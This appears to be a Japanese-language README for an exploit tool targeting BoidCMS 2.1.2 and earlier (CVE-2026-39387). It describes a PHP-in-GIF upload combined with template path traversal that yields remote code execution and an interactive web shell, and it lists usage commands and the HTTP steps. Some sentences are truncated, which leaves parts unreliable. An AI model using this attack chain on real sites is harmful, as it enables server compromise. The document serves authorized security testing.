
BoidCMS <= 2.1.2 RCE エクスプロイト
BoidCMS <= 2.1.2 は、認証済み攻撃者が以下の2つの脆弱性を組み合わせることでリモートコード実行 (RCE) を達成することを許可します。
image/gif) のファイルを受け入れるため、GIF ファイルに埋め込まれた PHP コードをサーバーに保存できます。tpl パラメータを受け入れるため、パストラバーサル (例: ../../media/shell.gif) を使用してアップロード済みファイルをページのテンプレートとして指定できます。細工されたページがレンダリングされると、PHP インタープリタが埋め込まれたペイロードを実行します。
| フィールド | 値 |
|---|---|
| ソフトウェア | BoidCMS |
| バージョン | <= 2.1.2 |
| CVE | CVE-2026-39387 |
python3 CVE-2026-39387.py -u <target_url> -l <username> -p <password>
python3 CVE-2026-39387.py -u http://target.com -l admin -p password123
エクスプロイトが完了すると、リモートホスト上でコマンドを実行するための対話型シェルプロンプト (cmd >>) が提供されます。
1. Login → POST /admin (with CSRF token)
2. Upload shell → POST /admin?page=media (shell.gif containing PHP payload)
3. Create page → POST /admin?page=create (tpl=../../media/shell.gif)
4. Execute shell → GET /<permalink>?cmd=<command>
pip install requests
このエクスプロイトは教育目的および許可されたセキュリティテスト専用に提供されています。所有していないシステム、または明示的なテスト許可がないシステムに対する不正使用は違法であり、非倫理的です。
| フラグ | 説明 | 例 |
|---|
-u, --url | 対象 BoidCMS サイトのベース URL | http://target.com |
-l, --user | 管理者ユーザー名 | admin |
-p, --passwd | 管理者パスワード | password123 |